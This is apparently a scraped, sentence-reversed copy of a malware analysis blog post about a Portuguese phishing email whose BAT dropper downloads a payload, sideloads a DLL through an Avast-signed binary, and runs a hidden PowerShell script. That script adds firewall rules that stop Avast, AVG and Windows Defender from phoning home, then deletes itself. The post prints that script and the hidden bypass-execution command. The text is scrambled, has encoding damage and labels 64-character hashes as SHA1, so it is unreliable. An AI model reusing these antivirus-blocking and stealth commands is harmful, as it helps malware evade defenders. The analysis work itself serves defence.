donlmka.blogg.se

I'll check deeper the PE file but did you already detect the same behaviour? Please share! The PE file fvenotify.exe is added to the Run registry for persistence. Remove-Item $MyInvocation.M圜ommand.Definition If ($appName -ne $null) Īdd-FirewallRule "3txqSDF2" "%ProgramFiles%\AVAST Software\Avast\avastui.exe"Īdd-FirewallRule "Ytb7kY9a" "%ProgramFiles%\AVAST Software\Avast\AvastSvc.exe"Īdd-FirewallRule "xgmQL8Wb" "%ProgramFiles%\AVAST Software\Avast\setup\instup.exe"Īdd-FirewallRule "ABZBkNHB" "%ProgramFiles(x86)%\AVG\Antivirus\avgui.exe"Īdd-FirewallRule "eLGeMJyw" "%ProgramFiles(x86)%\AVG\Antivirus\AVGSvc.exe"Īdd-FirewallRule "9LEY6ZsT" "%ProgramFiles(x86)%\AVG\Antivirus\setup\instup.exe"Īdd-FirewallRule "uNUG4JaK" "%ProgramFiles%\Windows Defender\MpCmdRun.exe"Īdd-FirewallRule "d9mjBtLt" "%ProgramFiles%\Windows Defender\MSASCui.exe"

$rule = New-Object -ComObject HNetCfg.FWRule $fw = New-Object -ComObject hnetcfg.fwpolicy2 It modifies the current Windows firewall rules to prevent some antivirus to "phone home”. When I re-executed the WSF file, the name changed to "ftp.exe".īut the suspicious PE file generates a new PowerShell script in %TEMP% and executes it. The file fvenotify.exe is reported clean on VT and is signed by Avast as their SafeZone Browser. %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -WindowStyle Hidden -command Start-Process '"%bmh%”'Ī payload is downloaded from hXXps://77org/p2r.php? (note that a valid SSL certificate is used) and two files are created:Ĭ:\rx hsdj\o\i\x\ffax bnzx\fvenotify.exe (SHA1: 6d28d5453d0c2ca132ba3b3d7f0a121427090c1eb52f7d2a5c3e4e5440411bc7)Ĭ:\rx hsdj\o\i\x\ffax bnzx\secur32.dll (SHA1: 2ee0c761a25310e34c9d3c9d3e810192d8bbd10d4051522e3eefdc1bd71a17bb)

Inside the archive, a simple BAT file: "Panilha Orcamento Contabil 32f5.bat" (SHA1: c191821ddb1db46349afdb08789312ce418696d1) with was unknown on VT. There was one attached ZIP archive: PanilhaOrcamento.zip (SHA1: 3c159f65ba88bb208df30822d2a88b6531e4d0a7) with a VT score of 0/58. Yesterday, I found an interesting sample that I started to analyze… It reached my spam trap attached to an email in Portuguese with the subject: "Venho por meio desta solicitar orçamento dos produtos” ("I hereby request the products budget”).